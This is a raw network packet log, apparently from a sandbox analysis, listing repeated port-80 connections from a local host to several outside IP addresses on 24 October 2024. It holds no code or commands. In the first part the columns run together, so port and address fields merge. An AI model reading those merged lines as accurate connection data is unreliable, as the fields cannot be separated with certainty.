                                                                                                                    Oct 24, 2024 05:07:51.109855890 CEST5001280192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:51.169250011 CEST5001280192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:51.175199032 CEST805001265.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:51.965693951 CEST805001265.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:52.010165930 CEST5001280192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:52.096380949 CEST805001265.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:52.096465111 CEST5001280192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:52.682143927 CEST5001280192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:53.703777075 CEST5001380192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:53.709924936 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.710084915 CEST5001380192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:53.725924015 CEST5001380192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:53.731859922 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.731961966 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.731992960 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.732022047 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.732074976 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.732104063 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.732131958 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.732160091 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.732192993 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:54.566273928 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:54.566469908 CEST5001380192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:55.229217052 CEST5001380192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:55.235456944 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:56.249533892 CEST5001480192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:56.255517960 CEST805001465.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:56.255635023 CEST5001480192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:56.262965918 CEST5001480192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:56.268767118 CEST805001465.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:57.147090912 CEST805001465.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:57.197650909 CEST5001480192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:57.294240952 CEST805001465.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:57.294631958 CEST5001480192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:57.295335054 CEST5001480192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:57.301153898 CEST805001465.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:03.084068060 CEST5001580192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:03.089929104 CEST8050015107.148.177.200192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:03.090147972 CEST5001580192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:03.102500916 CEST5001580192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:03.108454943 CEST8050015107.148.177.200192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:03.629532099 CEST8050015107.148.177.200192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:03.685062885 CEST5001580192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:03.710988998 CEST8050015107.148.177.200192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:03.711260080 CEST5001580192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:04.606174946 CEST5001580192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:05.622920036 CEST5001680192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:05.628773928 CEST8050016107.148.177.200192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:05.628855944 CEST5001680192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:05.639368057 CEST5001680192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:05.645342112 CEST8050016107.148.177.200192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:06.173131943 CEST8050016107.148.177.200192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:06.229021072 CEST5001680192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:06.254935026 CEST8050016107.148.177.200192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:06.255184889 CEST5001680192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:07.150851011 CEST5001680192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:08.169656992 CEST5001780192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:08.175515890 CEST8050017107.148.177.200192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:08.176270962 CEST5001780192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:08.192055941 CEST5001780192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:08.198211908 CEST8050017107.148.177.200192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:08.198255062 CEST8050017107.148.177.200192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.160309076 CEST5003380192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:03.171505928 CEST5003380192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:03.178092003 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.178129911 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.178149939 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.178164959 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.178185940 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.178345919 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.178363085 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.178381920 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.178404093 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.869575024 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.869662046 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.869715929 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.869791031 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.869860888 CEST5003380192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:03.869860888 CEST5003380192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:03.907279015 CEST805003363.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:03.907342911 CEST5003380192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:04.682401896 CEST5003380192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:05.700948954 CEST5003480192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:05.706542969 CEST805003463.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:05.706626892 CEST5003480192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:05.715007067 CEST5003480192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:05.720463037 CEST805003463.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:06.409394026 CEST805003463.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:06.409436941 CEST805003463.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:06.409461021 CEST805003463.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:06.409478903 CEST805003463.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:06.409506083 CEST805003463.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:06.409600019 CEST5003480192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:06.409600019 CEST5003480192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:06.448036909 CEST805003463.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:06.448185921 CEST5003480192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:06.448931932 CEST5003480192.168.2.463.250.47.57
                                                                                                                    Oct 24, 2024 05:09:06.454626083 CEST805003463.250.47.57192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:11.486368895 CEST5003580192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:11.491889000 CEST8050035104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:11.491972923 CEST5003580192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:11.500847101 CEST5003580192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:11.506221056 CEST8050035104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:12.547717094 CEST8050035104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:12.550021887 CEST8050035104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:12.550118923 CEST5003580192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:13.010312080 CEST5003580192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:14.030565977 CEST5003680192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:14.036113977 CEST8050036104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:14.038122892 CEST5003680192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:14.046545982 CEST5003680192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:14.052814007 CEST8050036104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:15.124953032 CEST8050036104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:15.127540112 CEST8050036104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:15.127587080 CEST5003680192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:15.557199955 CEST5003680192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:16.575428009 CEST5003780192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:16.581402063 CEST8050037104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:16.584055901 CEST5003780192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:16.596067905 CEST5003780192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:16.602102041 CEST8050037104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:16.602165937 CEST8050037104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:16.602206945 CEST8050037104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:16.602247000 CEST8050037104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:16.602287054 CEST8050037104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:16.602325916 CEST8050037104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:16.602363110 CEST8050037104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:16.602432013 CEST8050037104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:16.602472067 CEST8050037104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:17.645891905 CEST8050037104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:17.648121119 CEST8050037104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:17.648214102 CEST5003780192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:18.108005047 CEST5003780192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:19.122601986 CEST5003880192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:19.128420115 CEST8050038104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:19.128515959 CEST5003880192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:19.138901949 CEST5003880192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:19.144676924 CEST8050038104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:20.179879904 CEST8050038104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:20.179960012 CEST8050038104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:20.182483912 CEST8050038104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:20.182534933 CEST5003880192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:20.184870005 CEST5003880192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:20.184870005 CEST5003880192.168.2.4104.21.78.104
                                                                                                                    Oct 24, 2024 05:09:20.190587044 CEST8050038104.21.78.104192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:25.238270998 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:25.244025946 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:25.244121075 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:25.259735107 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:25.265811920 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712548018 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712635040 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712687016 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712734938 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712783098 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712801933 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:26.712801933 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:26.712835073 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712884903 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712932110 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.712975979 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:26.712980986 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.713033915 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.713387012 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:26.718904018 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.718976021 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.719033003 CEST805003968.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:26.719079971 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:26.760400057 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:26.778197050 CEST5003980192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:27.797614098 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:27.805181026 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:27.805361032 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:27.818133116 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:27.825129986 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.234895945 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.234935045 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.234961987 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.234981060 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.234986067 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.235018015 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.235022068 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.235037088 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.235064030 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.235081911 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.235085964 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.235110044 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.235131025 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.235157967 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.235179901 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.240726948 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.240776062 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.240813971 CEST805004068.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:29.240933895 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.291661978 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:29.322866917 CEST5004080192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:30.342817068 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:30.348561049 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.348721981 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:30.362407923 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:30.367965937 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.367996931 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368016005 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368033886 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368050098 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368082047 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368100882 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368124008 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:30.368141890 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.780839920 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.780910969 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.780952930 CEST5004180192.168.2.468.66.226.116
                                                                                                                    Oct 24, 2024 05:09:31.780987978 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.781039000 CEST805004168.66.226.116192.168.2.4
                                                                                                                    Oct 24, 2024 05:09:31.781079054 CEST5004180192.168.2.468.66.226.116
Oct 24, 2024 05:09:31.781089067 CEST  80           50041      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:31.781136990 CEST  80           50041      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:31.781171083 CEST  50041        80         192.168.2.4      68.66.226.116
Oct 24, 2024 05:09:31.781188965 CEST  80           50041      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:31.781239986 CEST  80           50041      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:31.781280041 CEST  50041        80         192.168.2.4      68.66.226.116
Oct 24, 2024 05:09:31.781290054 CEST  80           50041      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:31.781342983 CEST  80           50041      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:31.781457901 CEST  50041        80         192.168.2.4      68.66.226.116
Oct 24, 2024 05:09:31.786997080 CEST  80           50041      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:31.787074089 CEST  80           50041      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:31.787122965 CEST  50041        80         192.168.2.4      68.66.226.116
Oct 24, 2024 05:09:31.787131071 CEST  80           50041      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:31.838408947 CEST  50041        80         192.168.2.4      68.66.226.116
Oct 24, 2024 05:09:31.869769096 CEST  50041        80         192.168.2.4      68.66.226.116
Oct 24, 2024 05:09:32.892040968 CEST  50042        80         192.168.2.4      68.66.226.116
Oct 24, 2024 05:09:32.898180008 CEST  80           50042      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:32.898400068 CEST  50042        80         192.168.2.4      68.66.226.116
Oct 24, 2024 05:09:32.907213926 CEST  50042        80         192.168.2.4      68.66.226.116
Oct 24, 2024 05:09:32.913253069 CEST  80           50042      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:33.813411951 CEST  80           50042      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:33.834315062 CEST  80           50042      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:33.834399939 CEST  50042        80         192.168.2.4      68.66.226.116
Oct 24, 2024 05:09:33.839294910 CEST  50042        80         192.168.2.4      68.66.226.116
Oct 24, 2024 05:09:33.844759941 CEST  80           50042      68.66.226.116    192.168.2.4
Oct 24, 2024 05:09:38.887001991 CEST  50043        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:38.892527103 CEST  80           50043      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:38.892679930 CEST  50043        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:38.902848005 CEST  50043        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:38.908317089 CEST  80           50043      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:39.597923994 CEST  80           50043      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:39.598001003 CEST  50043        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:40.416604996 CEST  50043        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:40.422645092 CEST  80           50043      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:41.436980963 CEST  50044        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:41.442943096 CEST  80           50044      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:41.443067074 CEST  50044        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:41.457381010 CEST  50044        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:41.463160038 CEST  80           50044      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:42.144850016 CEST  80           50044      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:42.147205114 CEST  50044        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:42.964025021 CEST  50044        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:42.970560074 CEST  80           50044      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:43.981728077 CEST  50045        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:43.987633944 CEST  80           50045      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:43.987752914 CEST  50045        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:43.998207092 CEST  50045        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:44.004457951 CEST  80           50045      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:44.004503012 CEST  80           50045      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:44.004542112 CEST  80           50045      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:44.004580975 CEST  80           50045      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:44.004645109 CEST  80           50045      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:44.004684925 CEST  80           50045      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:44.004724026 CEST  80           50045      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:44.004761934 CEST  80           50045      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:44.004798889 CEST  80           50045      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:44.659054041 CEST  80           50045      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:44.660192966 CEST  50045        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:45.515767097 CEST  50045        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:45.521496058 CEST  80           50045      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:46.529040098 CEST  50046        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:46.535440922 CEST  80           50046      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:46.535543919 CEST  50046        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:46.543308020 CEST  50046        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:46.549185991 CEST  80           50046      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:47.209832907 CEST  80           50046      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:47.242439985 CEST  80           50046      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:47.242547035 CEST  50046        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:47.244221926 CEST  50046        80         192.168.2.4      13.248.169.48
Oct 24, 2024 05:09:47.249865055 CEST  80           50046      13.248.169.48    192.168.2.4
Oct 24, 2024 05:09:52.265233040 CEST  50047        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:52.270710945 CEST  80           50047      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:52.275268078 CEST  50047        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:52.287062883 CEST  50047        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:52.292588949 CEST  80           50047      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:52.915178061 CEST  80           50047      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:52.918185949 CEST  50047        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:53.791881084 CEST  50047        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:53.797410011 CEST  80           50047      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:54.810273886 CEST  50048        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:54.815874100 CEST  80           50048      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:54.818178892 CEST  50048        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:54.836038113 CEST  50048        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:54.841635942 CEST  80           50048      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:55.447295904 CEST  80           50048      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:55.447491884 CEST  50048        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:56.338660002 CEST  50048        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:56.344129086 CEST  80           50048      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:57.385406971 CEST  50049        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:57.391109943 CEST  80           50049      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:57.391196012 CEST  50049        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:57.459743977 CEST  50049        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:57.465209007 CEST  80           50049      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:57.465255022 CEST  80           50049      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:57.465274096 CEST  80           50049      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:57.465291023 CEST  80           50049      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:57.465306997 CEST  80           50049      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:57.465523005 CEST  80           50049      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:57.465554953 CEST  80           50049      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:57.465572119 CEST  80           50049      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:57.465590954 CEST  80           50049      3.33.130.190     192.168.2.4
Oct 24, 2024 05:09:58.025417089 CEST  80           50049      3.33.130.190     192.168.2.4
